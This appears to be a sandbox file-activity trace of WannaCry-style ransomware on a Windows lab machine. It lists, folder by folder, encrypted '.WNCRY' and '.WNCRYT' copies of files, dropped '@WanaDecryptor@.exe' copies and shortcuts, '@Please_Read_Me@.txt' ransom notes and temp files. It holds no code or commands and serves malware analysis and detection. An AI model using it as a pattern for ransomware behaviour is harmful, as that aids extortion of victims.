C:\ba69bdf0a250e352360c33\1033\*
C:\ba69bdf0a250e352360c33\1033
C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1033\eula.rtf
C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1033\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1033\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1035\*
C:\ba69bdf0a250e352360c33\1035
C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1035\eula.rtf
C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1035\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1035\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1036\*
C:\ba69bdf0a250e352360c33\1036
C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1036\eula.rtf
C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1036\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1036\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1037\*
C:\ba69bdf0a250e352360c33\1037
C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1037\eula.rtf
C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1037\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1037\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1038\*
C:\ba69bdf0a250e352360c33\1038
C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1038\eula.rtf
C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1038\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1038\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1040\*
C:\ba69bdf0a250e352360c33\1040
C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1040\eula.rtf
C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1040\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1040\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1041\*
C:\ba69bdf0a250e352360c33\1041
C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1041\eula.rtf
C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1041\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1041\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1042\*
C:\ba69bdf0a250e352360c33\1042
C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1042\eula.rtf
C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1042\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1042\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1043\*
C:\ba69bdf0a250e352360c33\1043
C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1043\eula.rtf
C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1043\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1043\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1044\*
C:\ba69bdf0a250e352360c33\1044
C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1044\eula.rtf
C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1044\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1044\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1045\*
C:\ba69bdf0a250e352360c33\1045
C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1045\eula.rtf
C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1045\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1045\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1046\*
C:\ba69bdf0a250e352360c33\1046
C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1046\eula.rtf
C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1046\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1046\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1049\*
C:\ba69bdf0a250e352360c33\1049
C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1049\eula.rtf
C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1049\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1049\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1053\*
C:\ba69bdf0a250e352360c33\1053
C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1053\eula.rtf
C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1053\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1053\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1055\*
C:\ba69bdf0a250e352360c33\1055
C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1055\eula.rtf
C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1055\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1055\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\2052\*
C:\ba69bdf0a250e352360c33\2052
C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\2052\eula.rtf
C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2052\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\2052\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\2070\*
C:\ba69bdf0a250e352360c33\2070
C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\2070\eula.rtf
C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2070\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\2070\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\3082\*
C:\ba69bdf0a250e352360c33\3082
C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\3082\eula.rtf
C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\3082\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\3082\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\Graphics\*
C:\ba69bdf0a250e352360c33\Graphics
C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
C:\ba69bdf0a250e352360c33\NetFx45\*
C:\ba69bdf0a250e352360c33\NetFx45
C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
C:\ba69bdf0a250e352360c33\NetFx451\*
C:\ba69bdf0a250e352360c33\NetFx451
C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
C:\ba69bdf0a250e352360c33\NetFx452\*
C:\ba69bdf0a250e352360c33\NetFx452
C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
C:\ba69bdf0a250e352360c33\NetFx46\*
C:\ba69bdf0a250e352360c33\NetFx46
C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
C:\ba69bdf0a250e352360c33\NetFx461\*
C:\ba69bdf0a250e352360c33\NetFx461
C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
C:\ba69bdf0a250e352360c33\NetFx462\*
C:\ba69bdf0a250e352360c33\NetFx462
C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
C:\ba69bdf0a250e352360c33\NetFx47\*
C:\ba69bdf0a250e352360c33\NetFx47
C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
C:\ba69bdf0a250e352360c33\NetFx471\*
C:\ba69bdf0a250e352360c33\NetFx471
C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
C:\ba69bdf0a250e352360c33\NetFx472\*
C:\ba69bdf0a250e352360c33\NetFx472
C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
C:\Boot\*
C:\Boot
C:\Boot\~SD7866.tmp
C:\Boot\cs-CZ\*
C:\Boot\cs-CZ
C:\Boot\cs-CZ\~SD7867.tmp
C:\Boot\da-DK\*
C:\Boot\da-DK
C:\Boot\da-DK\~SD7868.tmp
C:\Boot\de-DE\*
C:\Boot\de-DE
C:\Boot\de-DE\~SD7869.tmp
C:\Boot\el-GR\*
C:\Boot\el-GR
C:\Boot\el-GR\~SD786A.tmp
C:\Boot\en-US\*
C:\Boot\en-US
C:\Boot\en-US\~SD787A.tmp
C:\Boot\es-ES\*
C:\Boot\es-ES
C:\Boot\es-ES\~SD787B.tmp
C:\Boot\fi-FI\*
C:\Boot\fi-FI
C:\Boot\fi-FI\~SD787C.tmp
C:\Boot\Fonts\*
C:\Boot\Fonts
C:\Boot\Fonts\~SD787D.tmp
C:\Boot\fr-FR\*
C:\Boot\fr-FR
C:\Boot\fr-FR\~SD787E.tmp
C:\Boot\hu-HU\*
C:\Boot\hu-HU
C:\Boot\hu-HU\~SD787F.tmp
C:\Boot\it-IT\*
C:\Boot\it-IT
C:\Boot\it-IT\~SD7880.tmp
C:\Boot\ja-JP\*
C:\Boot\ja-JP
C:\Boot\ja-JP\~SD7881.tmp
C:\Boot\ko-KR\*
C:\Boot\ko-KR
C:\Boot\ko-KR\~SD7882.tmp
C:\Boot\nb-NO\*
C:\Boot\nb-NO
C:\Boot\nb-NO\~SD7893.tmp
C:\Boot\nl-NL\*
C:\Boot\nl-NL
C:\Boot\nl-NL\~SD7894.tmp
C:\Boot\pl-PL\*
C:\Boot\pl-PL
C:\Boot\pl-PL\~SD7895.tmp
C:\Boot\pt-BR\*
C:\Boot\pt-BR
C:\Boot\pt-BR\~SD7896.tmp
C:\Boot\pt-PT\*
C:\Boot\pt-PT
C:\Boot\pt-PT\~SD7897.tmp
C:\Boot\ru-RU\*
C:\Boot\ru-RU
C:\Boot\ru-RU\~SD7898.tmp
C:\Boot\sv-SE\*
C:\Boot\sv-SE
C:\Boot\sv-SE\~SD7899.tmp
C:\Boot\tr-TR\*
C:\Boot\tr-TR
C:\Boot\tr-TR\~SD78AA.tmp
C:\Boot\zh-CN\*
C:\Boot\zh-CN
C:\Boot\zh-CN\~SD78AB.tmp
C:\Boot\zh-HK\*
C:\Boot\zh-HK
C:\Boot\zh-HK\~SD78AC.tmp
C:\Boot\zh-TW\*
C:\Boot\zh-TW
C:\Boot\zh-TW\~SD78AD.tmp
C:\Documents and Settings\*
C:\PerfLogs\*
C:\PerfLogs
C:\PerfLogs\~SD78AE.tmp
C:\PerfLogs\Admin\*
C:\PerfLogs\Admin
C:\PerfLogs\Admin\~SD78AF.tmp
C:\PSTranscripts\*
C:\PSTranscripts
C:\PSTranscripts\~SD78B0.tmp
C:\PSTranscripts\20251206\*
C:\PSTranscripts\20251206
C:\PSTranscripts\20251206\~SD78B1.tmp
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRY
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRY
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
C:\PSTranscripts\20251206\@Please_Read_Me@.txt
C:\PSTranscripts\20251206\@WanaDecryptor@.exe
C:\Recovery\*
C:\Recovery
C:\Recovery\~SD78C1.tmp
C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\*
C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae
C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
C:\Sysmon\*
C:\Sysmon
C:\Sysmon\~SD78C3.tmp
C:\Sysmon\sysmonconfig.txt.WNCRY
C:\Sysmon\sysmonconfig.txt
C:\Sysmon\sysmonconfig.txt.WNCRYT
C:\Sysmon\@Please_Read_Me@.txt
C:\Sysmon\@WanaDecryptor@.exe
C:\System Volume Information\*
C:\Users\*
C:\Users
C:\Users\~SD78D4.tmp
C:\Users\All Users\*
C:\Users\All Users
C:\Users\All Users\~SD78D5.tmp
C:\Users\All Users\Adobe\*
C:\Users\All Users\Adobe
C:\Users\All Users\Adobe\~SD78D6.tmp
C:\Users\All Users\Adobe\ARM\*
C:\Users\All Users\Adobe\ARM
C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\*
C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}
C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
C:\Users\All Users\Adobe\Setup\*
C:\Users\All Users\Adobe\Setup
C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\*
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\*
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\*
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\*
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
C:\Users\All Users\Application Data\*
C:\Users\All Users\Boxstarter\*
C:\Users\All Users\Boxstarter
C:\Users\All Users\Boxstarter\~SD790D.tmp
C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRY
C:\Users\All Users\Boxstarter\LICENSE.txt
C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
C:\Users\All Users\Boxstarter\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\@WanaDecryptor@.exe
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\*
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\*
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\*
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\*
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Common\*
C:\Users\All Users\Boxstarter\Boxstarter.Common
C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\*
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\*
C:\Users\All Users\Boxstarter\Boxstarter.HyperV
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\*
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\BuildPackages\*
C:\Users\All Users\Boxstarter\BuildPackages
C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
C:\Users\All Users\chocolatey\*
C:\Users\All Users\chocolatey
C:\Users\All Users\chocolatey\~SD7955.tmp
C:\Users\All Users\chocolatey\CREDITS.txt.WNCRY
C:\Users\All Users\chocolatey\CREDITS.txt
C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
C:\Users\All Users\chocolatey\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\@WanaDecryptor@.exe
C:\Users\All Users\chocolatey\.chocolatey\*
C:\Users\All Users\chocolatey\.chocolatey
C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\*
C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1
C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\*
C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1
C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\*
C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263
C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\*
C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00
C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\*
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\*
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\*
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13
C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1
C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13
C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\*
C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1
C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\*
C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930
C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\*
C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5
C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\*
C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88
C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\*
C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351
C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\*
C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915
C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\*
C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915
C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
